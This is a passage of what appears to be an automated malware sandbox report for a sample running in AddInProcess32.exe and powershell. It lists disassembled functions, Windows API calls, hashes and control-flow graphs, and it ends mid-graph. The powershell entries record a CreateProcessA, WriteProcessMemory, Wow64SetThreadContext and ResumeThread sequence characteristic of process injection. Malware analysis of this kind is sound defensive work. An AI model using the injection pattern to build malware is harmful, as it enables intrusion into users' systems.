                                            • Instruction Fuzzy Hash: 6601D872A01225BB73129BBE5C8CDBF2A6DFBC69E0311012AFD0CC7288DB658C0181B0
                                            APIs
                                            • GetLastError.KERNEL32(00000000,?,00000000,1000636D,10005713,00000000,?,10002249,?,?,10001D66,00000000,?,?,00000000), ref: 10005B7F
                                            • _free.LIBCMT ref: 10005BB4
                                            • _free.LIBCMT ref: 10005BDB
                                            • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BE8
                                            • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BF1
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.3342349571.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 0000000F.00000002.3342305920.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000F.00000002.3342349571.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_10000000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: ErrorLast$_free
                                            • String ID:
                                            • API String ID: 3170660625-0
                                            • Opcode ID: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                            • Instruction ID: a404960836b3e2f032ab47abdd1028028b52a365ddf0c47563f665e512f3cffd
                                            • Opcode Fuzzy Hash: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                            • Instruction Fuzzy Hash: 5501F47A108A52A7F202E7345C85E1F3AAEDBC55F37220025FD19A615EEF73FD024164
                                            APIs
                                            • lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                            • lstrcatW.KERNEL32(?,?,?,100010DF,?,?,?,00000000), ref: 10001EAC
                                            • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                            • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                            • lstrcatW.KERNEL32(?,100010DF,?,100010DF,?,?,?,00000000), ref: 10001ED3
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.3342349571.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 0000000F.00000002.3342305920.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000F.00000002.3342349571.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_10000000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: lstrlen$lstrcat
                                            • String ID:
                                            • API String ID: 493641738-0
                                            • Opcode ID: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                            • Instruction ID: f5d9027fafc921fe84ae6627056796c55de3fa1ad923a59450c5185d8ca5453c
                                            • Opcode Fuzzy Hash: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                            • Instruction Fuzzy Hash: D8F082261002207AF621772AECC5FBF7B7CEFC6AA0F04001AFA0C83194DB54684292B5
                                            APIs
                                            • _free.LIBCMT ref: 100091D0
                                              • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                              • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                            • _free.LIBCMT ref: 100091E2
                                            • _free.LIBCMT ref: 100091F4
                                            • _free.LIBCMT ref: 10009206
                                            • _free.LIBCMT ref: 10009218
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.3342349571.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 0000000F.00000002.3342305920.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000F.00000002.3342349571.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_10000000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: _free$ErrorFreeHeapLast
                                            • String ID:
                                            • API String ID: 776569668-0
                                            • Opcode ID: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                            • Instruction ID: a08e021c65853776c99c3fd86fadada58ae96d962e635c5153d22f52a77de1c5
                                            • Opcode Fuzzy Hash: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                            • Instruction Fuzzy Hash: 77F06DB161C650ABE664DB58EAC6C4B7BEDFB003E13608805FC4DD7549CB31FC809A64
                                            APIs
                                            • _free.LIBCMT ref: 1000536F
                                              • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                              • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                            • _free.LIBCMT ref: 10005381
                                            • _free.LIBCMT ref: 10005394
                                            • _free.LIBCMT ref: 100053A5
                                            • _free.LIBCMT ref: 100053B6
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.3342349571.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 0000000F.00000002.3342305920.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000F.00000002.3342349571.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_10000000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: _free$ErrorFreeHeapLast
                                            • String ID:
                                            • API String ID: 776569668-0
                                            • Opcode ID: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                            • Instruction ID: ba906e9feca9bc6e71cd1aa5ebacb8f64a9f241ffe6b13fedf7f16c4e4854dfa
                                            • Opcode Fuzzy Hash: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                            • Instruction Fuzzy Hash: 38F0F478C18934EBF741DF28ADC140A3BB5F718A91342C15AFC1497279DB36D9429B84
                                            APIs
                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000104), ref: 10004C1D
                                            • _free.LIBCMT ref: 10004CE8
                                            • _free.LIBCMT ref: 10004CF2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.3342349571.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 0000000F.00000002.3342305920.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000F.00000002.3342349571.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_10000000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: _free$FileModuleName
                                            • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                            • API String ID: 2506810119-760905667
                                            • Opcode ID: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                            • Instruction ID: 12f2da1a58c9c923660241357757b5dddff340f6d61411cdc8d35d961f62cc7a
                                            • Opcode Fuzzy Hash: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                            • Instruction Fuzzy Hash: EB31A0B5A01258EFFB51CF99CC81D9EBBFCEB88390F12806AF80497215DA709E41CB54
                                            APIs
                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,10006FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 10008731
                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 100087BA
                                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 100087CC
                                            • __freea.LIBCMT ref: 100087D5
                                              • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.3342349571.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 0000000F.00000002.3342305920.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000F.00000002.3342349571.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_10000000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                            • String ID:
                                            • API String ID: 2652629310-0
                                            • Opcode ID: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                            • Instruction ID: 5b9b35b0a4db414dac5c81271493033b4f2f0f3dd9b893eeefd60fa04c8ec889
                                            • Opcode Fuzzy Hash: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                            • Instruction Fuzzy Hash: 2731AE32A0021AABEF15CF64CC85EAF7BA5EF44290F214129FC48D7158EB35DE50CBA0
                                            APIs
                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,10001D66,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue), ref: 10005D13
                                            • GetLastError.KERNEL32(?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000,00000364,?,10005BC8), ref: 10005D1F
                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000), ref: 10005D2D
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.3342349571.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 0000000F.00000002.3342305920.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000F.00000002.3342349571.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_10000000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: LibraryLoad$ErrorLast
                                            • String ID:
                                            • API String ID: 3177248105-0
                                            • Opcode ID: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                            • Instruction ID: ab8c2af688280ff547417c348c7c3430721907d0b6a0cc88e9d35c15e8af339b
                                            • Opcode Fuzzy Hash: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                            • Instruction Fuzzy Hash: 59018436615732ABE7319B689C8CB4B7798EF056E2B214623F909D7158D731D801CAE0
                                            APIs
                                            • _free.LIBCMT ref: 1000655C
                                              • Part of subcall function 100062BC: IsProcessorFeaturePresent.KERNEL32(00000017,100062AB,00000000,?,?,?,?,00000016,?,?,100062B8,00000000,00000000,00000000,00000000,00000000), ref: 100062BE
                                              • Part of subcall function 100062BC: GetCurrentProcess.KERNEL32(C0000417), ref: 100062E0
                                              • Part of subcall function 100062BC: TerminateProcess.KERNEL32(00000000), ref: 100062E7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.3342349571.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 0000000F.00000002.3342305920.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000F.00000002.3342349571.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_10000000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                            • String ID: *?$.
                                            • API String ID: 2667617558-3972193922
                                            • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                            • Instruction ID: 55016225c6cf3c2ad74d5bf99958d96f24b8fe448c0df4d83e2be8db5664878a
                                            • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                            • Instruction Fuzzy Hash: 2D519475E0060A9FEB14CFA8CC81AADB7F6FF4C394F258169E854E7349D635AE018B50
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.3342349571.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 0000000F.00000002.3342305920.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000F.00000002.3342349571.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_10000000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: _strlen
                                            • String ID: : $Se.
                                            • API String ID: 4218353326-4089948878
                                            • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                            • Instruction ID: 66f447a9efa091531784e06c0e565222335d100d85517175c1dac28435e0d9bb
                                            • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                            • Instruction Fuzzy Hash: 2F11E7B5904249AEDB11DFA8D841BDEFBFCEF09244F104056E545E7252E6706B02C765
                                            APIs
                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 10002903
                                              • Part of subcall function 100035D2: RaiseException.KERNEL32(?,?,?,10002925,00000000,00000000,00000000,?,?,?,?,?,10002925,?,100121B8), ref: 10003632
                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 10002920
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.3342349571.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 0000000F.00000002.3342305920.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000F.00000002.3342349571.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_10000000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: Exception@8Throw$ExceptionRaise
                                            • String ID: Unknown exception
                                            • API String ID: 3476068407-410509341
                                            • Opcode ID: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                            • Instruction ID: 696891806b75a506f07e96a947ab79166ff1ea0d2f17bc9dac180a151cc952bd
                                            • Opcode Fuzzy Hash: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                            • Instruction Fuzzy Hash: 2BF0A47890420D77AB04E6E5EC4599D77ACDB006D0F508161FD1496499EF31FA658690

                                            Execution Graph

                                            Execution Coverage:7.4%
                                            Dynamic/Decrypted Code Coverage:0%
                                            Signature Coverage:0%
                                            Total number of Nodes:12
                                            Total number of Limit Nodes:0

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 0 7ff848e30ee3-7ff848e30f19 3 7ff848e30f1f-7ff848e30f29 0->3 4 7ff848e310ad-7ff848e3114b 0->4 5 7ff848e30f2b-7ff848e30f40 3->5 6 7ff848e30f42-7ff848e30f47 3->6 53 7ff848e3114d-7ff848e3115f 4->53 5->6 7 7ff848e3104a-7ff848e31054 6->7 8 7ff848e30f4d-7ff848e30f50 6->8 13 7ff848e31056-7ff848e31064 7->13 14 7ff848e31065-7ff848e310aa 7->14 11 7ff848e30f99 8->11 12 7ff848e30f52-7ff848e30f65 8->12 18 7ff848e30f9b-7ff848e30f9d 11->18 12->4 24 7ff848e30f6b-7ff848e30f75 12->24 14->4 18->7 22 7ff848e30fa3-7ff848e30fa6 18->22 26 7ff848e30fa8-7ff848e30fb1 22->26 27 7ff848e30fbd-7ff848e30fc1 22->27 29 7ff848e30f8e-7ff848e30f97 24->29 30 7ff848e30f77-7ff848e30f84 24->30 26->27 27->7 34 7ff848e30fc7-7ff848e30fcd 27->34 29->18 30->29 36 7ff848e30f86-7ff848e30f8c 30->36 37 7ff848e30fe9-7ff848e30fef 34->37 38 7ff848e30fcf-7ff848e30fdc 34->38 36->29 39 7ff848e3100b-7ff848e31021 37->39 40 7ff848e30ff1-7ff848e31009 37->40 38->37 45 7ff848e30fde-7ff848e30fe7 38->45 49 7ff848e3103a-7ff848e31049 39->49 50 7ff848e31023-7ff848e31033 39->50 40->39 45->37 54 7ff848e31161 53->54 55 7ff848e31166-7ff848e31177 53->55 54->55 56 7ff848e31163 54->56 57 7ff848e31179 55->57 58 7ff848e3117e-7ff848e311c9 55->58 56->55 57->58 60 7ff848e3117b 57->60 58->53 62 7ff848e311cb-7ff848e31219 58->62 60->58 65 7ff848e313aa-7ff848e3145b 62->65 66 7ff848e3121f-7ff848e31229 62->66 116 7ff848e3145d 65->116 117 7ff848e31462-7ff848e31473 65->117 67 7ff848e3122b-7ff848e31240 66->67 68 7ff848e31242-7ff848e31247 66->68 67->68 71 7ff848e3124d-7ff848e31250 68->71 72 7ff848e31347-7ff848e31351 68->72 76 7ff848e31299 71->76 77 7ff848e31252-7ff848e31265 71->77 73 7ff848e31362-7ff848e313a7 72->73 74 7ff848e31353-7ff848e31361 72->74 73->65 79 7ff848e3129b-7ff848e3129d 76->79 77->65 85 7ff848e3126b-7ff848e31275 77->85 79->72 82 7ff848e312a3-7ff848e312a6 79->82 87 7ff848e312a8-7ff848e312b1 82->87 88 7ff848e312bd-7ff848e312c1 82->88 90 7ff848e3128e-7ff848e31297 85->90 91 7ff848e31277-7ff848e31284 85->91 87->88 88->72 97 7ff848e312c7-7ff848e312cd 88->97 90->79 91->90 98 7ff848e31286-7ff848e3128c 91->98 99 7ff848e312e9-7ff848e312ef 97->99 100 7ff848e312cf-7ff848e312dc 97->100 98->90 103 7ff848e3130b-7ff848e3131e 99->103 104 7ff848e312f1-7ff848e31309 99->104 100->99 105 7ff848e312de-7ff848e312e7 100->105 112 7ff848e31320-7ff848e31335 103->112 113 7ff848e31337-7ff848e31346 103->113 104->103 105->99 112->113 116->117 118 7ff848e3145f 116->118 119 7ff848e3147a-7ff848e314a4 117->119 120 7ff848e31475 117->120 118->117 122 7ff848e314a6-7ff848e314b5 119->122 123 7ff848e314b7-7ff848e314da 119->123 120->119 121 7ff848e31477 120->121 121->119 122->123 125 7ff848e314dc-7ff848e3150f 123->125 126 7ff848e31524-7ff848e3152f 123->126 129 7ff848e3169f-7ff848e3174d 125->129 130 7ff848e31515-7ff848e3151f 125->130 131 7ff848e31539-7ff848e3153f 126->131 132 7ff848e31531-7ff848e31537 126->132 169 7ff848e31759-7ff848e31765 129->169 170 7ff848e3174f-7ff848e31755 129->170 130->131 133 7ff848e31521-7ff848e31522 130->133 134 7ff848e31634-7ff848e3163e 131->134 135 7ff848e31545-7ff848e31548 131->135 132->131 133->126 137 7ff848e31640-7ff848e31650 134->137 138 7ff848e31651-7ff848e3169c 134->138 140 7ff848e3154a-7ff848e3155d 135->140 141 7ff848e31591 135->141 138->129 140->129 151 7ff848e31563-7ff848e3156d 140->151 143 7ff848e31593-7ff848e31595 141->143 143->134 146 7ff848e3159b-7ff848e3159e 143->146 146->134 149 7ff848e315a4-7ff848e315a7 146->149 149->134 153 7ff848e315ad-7ff848e315e1 149->153 154 7ff848e3156f-7ff848e31584 151->154 155 7ff848e31586-7ff848e3158f 151->155 153->134 165 7ff848e315e3-7ff848e315e9 153->165 154->155 155->143 167 7ff848e315eb-7ff848e31606 165->167 168 7ff848e31608-7ff848e3161e 165->168 167->168 172 7ff848e31624-7ff848e31633 168->172 173 7ff848e31771-7ff848e317f4 169->173 174 7ff848e31767-7ff848e3176d 169->174 170->169 179 7ff848e3183b-7ff848e31845 173->179 180 7ff848e317f6-7ff848e31838 173->180 174->173 181 7ff848e31850-7ff848e3189b 179->181 182 7ff848e31847-7ff848e3184f 179->182
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.2810141330.00007FF848E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_7ff848e30000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: L_H
                                            • API String ID: 0-4018862940
                                            • Opcode ID: ae7da2ffcdd5f9dea70eee4054db1bfc514f076bd16a8289557f3070c0d3d953
                                            • Instruction ID: 41f45bb45b7734c365c51c40d4018ad31efb21253d06f7318aba30abc0c929a1
                                            • Opcode Fuzzy Hash: ae7da2ffcdd5f9dea70eee4054db1bfc514f076bd16a8289557f3070c0d3d953
                                            • Instruction Fuzzy Hash: 82722631A0EB894FE796AB2C58551B47BE1FF46260F0901FFE04DC7193DE299C468396

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 190 7ff848d6a634-7ff848d6a63b 191 7ff848d6a63d-7ff848d6a645 190->191 192 7ff848d6a646-7ff848d6a714 190->192 191->192 196 7ff848d6a716-7ff848d6a725 192->196 197 7ff848d6a772-7ff848d6a7a4 192->197 196->197 198 7ff848d6a727-7ff848d6a72a 196->198 204 7ff848d6a7a6-7ff848d6a7b5 197->204 205 7ff848d6a802-7ff848d6a876 197->205 199 7ff848d6a72c-7ff848d6a73f 198->199 200 7ff848d6a764-7ff848d6a76c 198->200 202 7ff848d6a743-7ff848d6a756 199->202 203 7ff848d6a741 199->203 200->197 202->202 206 7ff848d6a758-7ff848d6a760 202->206 203->202 204->205 207 7ff848d6a7b7-7ff848d6a7ba 204->207 211 7ff848d6a878-7ff848d6a887 205->211 212 7ff848d6a8d4-7ff848d6a9dd CreateProcessA 205->212 206->200 209 7ff848d6a7bc-7ff848d6a7cf 207->209 210 7ff848d6a7f4-7ff848d6a7fc 207->210 213 7ff848d6a7d3-7ff848d6a7e6 209->213 214 7ff848d6a7d1 209->214 210->205 211->212 216 7ff848d6a889-7ff848d6a88c 211->216 225 7ff848d6a9df 212->225 226 7ff848d6a9e5-7ff848d6aa13 212->226 213->213 215 7ff848d6a7e8-7ff848d6a7f0 213->215 214->213 215->210 217 7ff848d6a88e-7ff848d6a8a1 216->217 218 7ff848d6a8c6-7ff848d6a8ce 216->218 221 7ff848d6a8a5-7ff848d6a8b8 217->221 222 7ff848d6a8a3 217->222 218->212 221->221 223 7ff848d6a8ba-7ff848d6a8c2 221->223 222->221 223->218 225->226
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.2802760888.00007FF848D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_7ff848d60000_powershell.jbxd
                                            Similarity
                                            • API ID: CreateProcess
                                            • String ID:
                                            • API String ID: 963392458-0
                                            • Opcode ID: 5bd52e89bb936f9a654aeacff7a46fcefee963df94f11fe87509ebe82dbc227f
                                            • Instruction ID: bc6b3b79ae6cbcc4b2530f4911825bbae90ef4dc25b650567bce3d74961b843d
                                            • Opcode Fuzzy Hash: 5bd52e89bb936f9a654aeacff7a46fcefee963df94f11fe87509ebe82dbc227f
                                            • Instruction Fuzzy Hash: 68C1C630918A8D8FDB64EF18DC567E977E1FB58310F10422EE84EC7291DF74A9858B82

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 229 7ff848d6a2d4-7ff848d6a2db 230 7ff848d6a2dd-7ff848d6a2e5 229->230 231 7ff848d6a2e6-7ff848d6a2fa 229->231 230->231 232 7ff848d6a2fc-7ff848d6a341 231->232 233 7ff848d6a344-7ff848d6a375 231->233 232->233 236 7ff848d6a37f-7ff848d6a3d4 WriteProcessMemory 233->236 237 7ff848d6a377-7ff848d6a37c 233->237 239 7ff848d6a3dc-7ff848d6a40d 236->239 240 7ff848d6a3d6 236->240 237->236 240->239
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.2802760888.00007FF848D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_7ff848d60000_powershell.jbxd
                                            Similarity
                                            • API ID: MemoryProcessWrite
                                            • String ID:
                                            • API String ID: 3559483778-0
                                            • Opcode ID: 12b9b5f786c427d34b5f63e4c35f941356053d02ccccd9879371f21428c4e452
                                            • Instruction ID: e84cc01e06c33f76ea9a591086c2d6d13cbfce7e28aa5dfdddb7bb3e5f7cc215
                                            • Opcode Fuzzy Hash: 12b9b5f786c427d34b5f63e4c35f941356053d02ccccd9879371f21428c4e452
                                            • Instruction Fuzzy Hash: B141D33190DB4C8FDB18AB9898466FD7BE0FB59710F00426EE489D3282CF74A8498B95

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 242 7ff848d6a0c8-7ff848d6a0cf 243 7ff848d6a0da-7ff848d6a0ea 242->243 244 7ff848d6a0d1-7ff848d6a0d9 242->244 245 7ff848d6a0ec-7ff848d6a132 243->245 246 7ff848d6a134-7ff848d6a14d 243->246 244->243 245->246 250 7ff848d6a14f-7ff848d6a154 246->250 251 7ff848d6a157-7ff848d6a192 Wow64SetThreadContext 246->251 250->251 253 7ff848d6a19a-7ff848d6a1c9 251->253 254 7ff848d6a194 251->254 254->253
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.2802760888.00007FF848D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_7ff848d60000_powershell.jbxd
                                            Similarity
                                            • API ID: ContextThreadWow64
                                            • String ID:
                                            • API String ID: 983334009-0
                                            • Opcode ID: 5ed0e55103d14f54d23f0b11df9b4a58a49071102553c02006474b98d5e3b18c
                                            • Instruction ID: ec48c403b826a911b0f293571ec8c41543a5095f124bf5902332753ae5046412
                                            • Opcode Fuzzy Hash: 5ed0e55103d14f54d23f0b11df9b4a58a49071102553c02006474b98d5e3b18c
                                            • Instruction Fuzzy Hash: 79310A31D0DB584FD728AF6898466FA7BE1EF55311F04423FE04AD3182DF78644A8795

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 256 7ff848d69fcd-7ff848d69fd9 257 7ff848d69fdb-7ff848d69fe3 256->257 258 7ff848d69fe4-7ff848d69ff3 256->258 257->258 259 7ff848d69ffe-7ff848d6a00a 258->259 260 7ff848d69ff5-7ff848d69ffd 258->260 261 7ff848d6a00c-7ff848d6a053 259->261 262 7ff848d6a054-7ff848d6a094 ResumeThread 259->262 260->259 261->262 267 7ff848d6a09c-7ff848d6a0c1 262->267 268 7ff848d6a096 262->268 268->267
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.2802760888.00007FF848D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_7ff848d60000_powershell.jbxd
                                            Similarity
                                            • API ID: ResumeThread
                                            • String ID:
                                            • API String ID: 947044025-0
                                            • Opcode ID: de823233b00e693fa981d54978cce2f0280f7033037378bb1e52b9d78919add9
                                            • Instruction ID: 132ffbbe4d1f57bc3c3ff0d3b1965efcb99042a63e43d7650d3684eb0539d603
                                            • Opcode Fuzzy Hash: de823233b00e693fa981d54978cce2f0280f7033037378bb1e52b9d78919add9
                                            • Instruction Fuzzy Hash: C631483090D78C8FDB1ADB6888467F97FA0EF56320F0442AFD089C7197CA686415C795

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 270 7ff848e304da-7ff848e304df 271 7ff848e30521-7ff848e3053a 270->271 272 7ff848e304e1-7ff848e30519 270->272 273 7ff848e3053c-7ff848e3056a 271->273 274 7ff848e30584 271->274 278 7ff848e3051b-7ff848e30520 272->278 279 7ff848e3049d-7ff848e304ce 272->279 280 7ff848e30570-7ff848e3057a 273->280 281 7ff848e306d7-7ff848e30717 273->281 277 7ff848e30585-7ff848e30589 274->277 282 7ff848e3058b-7ff848e30591 277->282 283 7ff848e30593-7ff848e30598 277->283 278->271 279->270 280->283 284 7ff848e3057c-7ff848e30583 280->284 302 7ff848e30719-7ff848e30787 281->302 303 7ff848e306ac-7ff848e306d4 281->303 282->283 286 7ff848e3059e-7ff848e305a1 283->286 287 7ff848e30670-7ff848e3067a 283->287 284->274 284->277 286->287 292 7ff848e305a7-7ff848e305aa 286->292 290 7ff848e3068b-7ff848e306a9 287->290 291 7ff848e3067c-7ff848e3068a 287->291 290->303 296 7ff848e305ac-7ff848e305b5 292->296 297 7ff848e305c1-7ff848e305c5 292->297 296->297 297->287 301 7ff848e305cb-7ff848e305ce 297->301 305 7ff848e305d0-7ff848e305e3 301->305 306 7ff848e305e5 301->306 330 7ff848e30789 302->330 331 7ff848e3078e-7ff848e3079f 302->331 303->281 309 7ff848e305e7-7ff848e305e9 305->309 306->309 309->287 311 7ff848e305ef-7ff848e305f5 309->311 312 7ff848e30611-7ff848e30617 311->312 313 7ff848e305f7-7ff848e30604 311->313 316 7ff848e30619-7ff848e30631 312->316 317 7ff848e30633-7ff848e30637 312->317 313->312 318 7ff848e30606-7ff848e3060f 313->318 316->317 321 